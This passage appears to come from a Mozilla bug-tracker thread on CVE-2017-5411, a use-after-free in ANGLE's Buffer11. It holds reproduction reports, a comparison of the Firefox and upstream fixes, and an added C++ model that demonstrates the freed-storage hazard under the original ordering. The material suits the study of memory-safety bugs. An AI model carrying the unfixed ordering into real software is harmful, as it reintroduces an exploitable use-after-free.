I was not able to reproduce on a Win7 laptop with a NVIDIA Quadro 1000M graphics card.
(In reply to Milan Sreckovic [:milan] from comment #39)
> I don't know that this applies to ESR45; it may have been a more recent
> change in ANGLE that broke this.

On the same machine as in comment 40 and 41 I cannot reproduce on ESR 45.7
Flags: sec-bounty? → sec-bounty+
I was unable to reproduce this crash on our Windows test machines using AMD GPUs. I tried 52.0a2-win32 (20161222004019) with ATI Radeon 3000, AMD Radeon R7 200 and NVIDIA GeForce 210 -- no success.

Removing qe-verify+ since there's nothing else I can do here to help. If there's someone else that could verify this on Beta 52 at least, that would be great.
Flags: qe-verify+
Whiteboard: [post-critsmash-triage]
Whiteboard: [post-critsmash-triage] → [post-critsmash-triage][adv-main52+]
Alias: CVE-2017-5411
(In reply to Jeff Gilbert [:jgilbert] from comment #46)
> Fixed upstream:
> https://github.com/google/angle/commit/
> c1a5d16e964ad524487eac9d2e4b5a65d837ff27

Our fix is not their fix. We set "mIdleness[usage] = 0;" in one place, they do it in two. (and the one place we do it is after the newStorage->resize() instead of before, but shouldn't matter if that's a simple reallocation as it sounds -- but maybe it does matter)

Looks like bug 1328762 was basically a dupe of this bug, but now shows that crashes were still happening in nightlies a couple of months after our fix was checked in.
Flags: needinfo?(jgilbert)
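The following is an added example, not ANGLE's Buffer11 code and not one of this bug's attachments: a reduced C++ model of the idleness bookkeeping visible in the ASan frames above (updateBufferStorage -> getStagingStorage -> getBufferStorage -> markBufferUsage -> checkForDeallocation -> ~SystemMemoryStorage) and of the ordering difference comment 47 describes, where the fix resets mIdleness[usage] before the sync instead of only after it. The usage enum, the Storage struct, the single kDeallocThreshold and the three-call sequence are assumptions chosen so the hazard reproduces deterministically; where Buffer11.cpp:807 wrote into the freed storage, the model checks that the slot still owns the pointer and returns nullptr instead, so it runs cleanly under a sanitizer.

```cpp
// Added example, not ANGLE's code. Reduced model of Buffer11's per-usage
// storages and idleness counters. Names follow the frames in the ASan report;
// bodies, kDeallocThreshold and the usages are assumptions for the model.
#include <cassert>
#include <cstdint>
#include <memory>
#include <vector>

enum BufferUsage {
    BUFFER_USAGE_STAGING = 0,
    BUFFER_USAGE_SYSTEM_MEMORY,
    BUFFER_USAGE_UNIFORM,
    BUFFER_USAGE_COUNT
};

struct Storage {
    std::vector<uint8_t> data;
    unsigned revision = 0;   // client-data revision this storage last synced to
};

class Buffer {
public:
    // Storages idle for more than this many uses of other storages are freed.
    // Assumption: ANGLE keeps a per-usage threshold; one constant suffices here.
    static constexpr unsigned kDeallocThreshold = 2;

    // markEarly == false: original ordering (idleness reset only after the sync).
    // markEarly == true : the "mark as used earlier" fix (reset before the sync).
    explicit Buffer(bool markEarly) : mMarkEarly(markEarly) {}

    // gl.bufferData: new client data, every storage is now stale.
    void setData(const std::vector<uint8_t>& bytes) { mLatest = bytes; ++mRevision; }

    // Returns the storage for `usage` synced to the latest data, or nullptr when
    // the storage was freed underneath the sync (the model's stand-in for the UAF).
    Storage* getBufferStorage(BufferUsage usage) {
        std::unique_ptr<Storage>& slot = mStorages[usage];
        if (!slot) {
            slot.reset(new Storage());
            mIdleness[usage] = 0;            // a fresh storage starts out "just used"
        }
        Storage* storage = slot.get();       // raw pointer held across the sync, as in Buffer11

        if (mMarkEarly) mIdleness[usage] = 0;   // the fix: the sync below cannot age us past the threshold

        bool ok = updateBufferStorage(storage, usage);
        markBufferUsage(usage);              // the original code only reset idleness here, after the sync
        return ok ? storage : nullptr;
    }

    bool hasStorage(BufferUsage usage) const { return mStorages[usage] != nullptr; }
    unsigned idleness(BufferUsage usage) const { return mIdleness[usage]; }

private:
    // Brings `storage` up to date. Non-staging storages are filled through the
    // staging storage, and fetching that runs markBufferUsage(STAGING), which
    // ages every other storage, `storage` included, and may free it.
    bool updateBufferStorage(Storage* storage, BufferUsage usage) {
        if (storage->revision == mRevision) return true;
        if (usage == BUFFER_USAGE_STAGING) {
            storage->data = mLatest;
            storage->revision = mRevision;
            return true;
        }
        Storage* staging = getStagingStorage();
        if (!staging) return false;
        // Buffer11.cpp:807 copied into `storage` at this point. The model refuses
        // if the slot no longer owns it, i.e. checkForDeallocation just deleted it.
        if (mStorages[usage].get() != storage) return false;
        storage->data = staging->data;
        storage->revision = mRevision;
        return true;
    }

    Storage* getStagingStorage() { return getBufferStorage(BUFFER_USAGE_STAGING); }

    // Using one storage ages all the others, then idle ones are collected.
    void markBufferUsage(BufferUsage usage) {
        mIdleness[usage] = 0;
        for (unsigned i = 0; i < BUFFER_USAGE_COUNT; ++i)
            if (i != static_cast<unsigned>(usage)) ++mIdleness[i];
        checkForDeallocation();
    }

    void checkForDeallocation() {
        for (unsigned i = 0; i < BUFFER_USAGE_COUNT; ++i) {
            if (i == BUFFER_USAGE_STAGING) continue;   // assumption: staging is never collected
            if (mStorages[i] && mIdleness[i] > kDeallocThreshold) mStorages[i].reset();  // frees the Storage
        }
    }

    bool mMarkEarly;
    std::vector<uint8_t> mLatest;
    unsigned mRevision = 0;
    std::unique_ptr<Storage> mStorages[BUFFER_USAGE_COUNT];
    unsigned mIdleness[BUFFER_USAGE_COUNT] = {0, 0, 0};
};

// Mirrors the test case's pattern: one buffer used as ARRAY_BUFFER (system-memory
// path) and as UNIFORM_BUFFER, with bufferData calls alternating between them.
// Constructed input bytes; returns whether the final system-memory sync kept its
// storage and received the latest data.
bool systemMemorySyncSurvives(bool markEarly) {
    Buffer buf(markEarly);
    buf.setData({1, 2, 3});
    buf.getBufferStorage(BUFFER_USAGE_SYSTEM_MEMORY);   // idleness[SYSTEM_MEMORY] ends at 0
    buf.setData({4, 5, 6});
    buf.getBufferStorage(BUFFER_USAGE_UNIFORM);         // ages SYSTEM_MEMORY up to kDeallocThreshold
    buf.setData({7, 8, 9});
    Storage* sys = buf.getBufferStorage(BUFFER_USAGE_SYSTEM_MEMORY);  // staging fetch ages it once more
    return sys != nullptr && sys->data == std::vector<uint8_t>{7, 8, 9};
}

int main() {
    assert(!systemMemorySyncSurvives(false));   // original ordering: storage freed mid-sync
    assert(systemMemorySyncSurvives(true));     // mark-as-used-earlier: storage survives
    return 0;
}
```

In the original ordering the third getBufferStorage(SYSTEM_MEMORY) finds its storage with idleness exactly at the threshold, and the staging fetch inside the sync pushes it over and frees it while the caller still holds the raw pointer; resetting the counter first is the only difference in the fixed run. The model keeps the Firefox patch's single reset rather than upstream's two, which is enough for this sequence but is not a claim about every path through the real Buffer11.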
See Also: → CVE-2017-5031
We thought we were fine before. I remember our fix being fine. Feel free to double-check though.
Flags: in-testsuite? → in-testsuite-
Flags: needinfo?(jgilbert)
Group: core-security-release